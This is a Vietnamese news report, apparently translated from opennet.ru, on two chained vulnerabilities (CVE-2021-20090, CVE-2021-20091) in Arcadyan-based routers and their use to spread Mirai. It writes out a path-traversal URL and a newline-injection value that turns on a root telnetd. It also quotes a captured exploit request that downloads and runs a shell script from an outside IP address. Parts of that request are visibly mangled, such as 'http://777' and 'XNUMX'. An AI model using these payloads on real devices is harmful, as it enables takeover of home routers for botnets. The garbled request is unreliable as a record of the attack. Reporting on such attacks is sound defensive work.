Một cuộc tấn công lớn đã được ghi lại trên mạng nhằm vào các bộ định tuyến gia đình có chương trình cơ sở sử dụng triển khai máy chủ HTTP của công ty Arcadyan. Để giành quyền kiểm soát các thiết bị, sự kết hợp của hai lỗ hổng được sử dụng cho phép thực thi mã tùy ý từ xa với quyền root. Sự cố này ảnh hưởng đến khá nhiều bộ định tuyến ADSL của Arcadyan, ASUS và Buffalo, cũng như các thiết bị được cung cấp dưới nhãn hiệu Beeline (sự cố được xác nhận trong Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone và các nhà khai thác viễn thông khác. Cần lưu ý rằng sự cố đã tồn tại trong phần sụn Arcadyan trong hơn 10 năm và trong thời gian này đã di chuyển sang ít nhất 20 mẫu thiết bị từ 17 nhà sản xuất khác nhau.
Lỗ hổng đầu tiên, CVE-2021-20090, khiến nó có thể truy cập bất kỳ tập lệnh giao diện web nào mà không cần xác thực. Bản chất của lỗ hổng bảo mật là trong giao diện web, một số thư mục gửi hình ảnh, tệp CSS và tập lệnh JavaScript có thể truy cập được mà không cần xác thực. Trong trường hợp này, các thư mục được phép truy cập mà không cần xác thực sẽ được kiểm tra bằng mặt nạ ban đầu. Việc chỉ định các ký tự “../” trong đường dẫn đến thư mục mẹ bị chương trình cơ sở chặn, nhưng việc sử dụng kết hợp “..%2f” sẽ bị bỏ qua. Do đó, có thể mở các trang được bảo vệ khi gửi yêu cầu như “http://192.168.1.1/images/..%2findex.htm”.
Lỗ hổng thứ hai, CVE-2021-20091, cho phép người dùng được xác thực thực hiện các thay đổi đối với cài đặt hệ thống của thiết bị bằng cách gửi các tham số được định dạng đặc biệt tới tập lệnh apply_abstract.cgi, tập lệnh này không kiểm tra sự hiện diện của ký tự dòng mới trong tham số . Ví dụ: khi thực hiện thao tác ping, kẻ tấn công có thể chỉ định giá trị “192.168.1.2%0AARC_SYS_TelnetdEnable=1” trong trường có địa chỉ IP đang được kiểm tra và tập lệnh khi tạo tệp cài đặt /tmp/etc/config/ .glbcfg, sẽ ghi dòng “AARC_SYS_TelnetdEnable=1” vào đó ", dòng này sẽ kích hoạt máy chủ telnetd, cung cấp quyền truy cập shell lệnh không hạn chế với quyền root. Tương tự, bằng cách đặt tham số AARC_SYS, bạn có thể thực thi bất kỳ mã nào trên hệ thống. Lỗ hổng đầu tiên có thể khiến tập lệnh có vấn đề chạy mà không cần xác thực bằng cách truy cập tập lệnh đó dưới dạng “/images/..%2faply_abstract.cgi”.
Để khai thác lỗ hổng, kẻ tấn công phải có khả năng gửi yêu cầu tới cổng mạng nơi giao diện web đang chạy. Đánh giá theo động thái lây lan của cuộc tấn công, nhiều nhà khai thác để lại quyền truy cập trên thiết bị của họ từ mạng bên ngoài để đơn giản hóa việc chẩn đoán sự cố bằng dịch vụ hỗ trợ. Nếu quyền truy cập vào giao diện chỉ bị giới hạn ở mạng nội bộ thì một cuộc tấn công có thể được thực hiện từ mạng bên ngoài bằng kỹ thuật “tái cấu trúc DNS”. Các lỗ hổng đang được sử dụng tích cực để kết nối các bộ định tuyến với mạng botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; Curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Nguồn: opennet.ru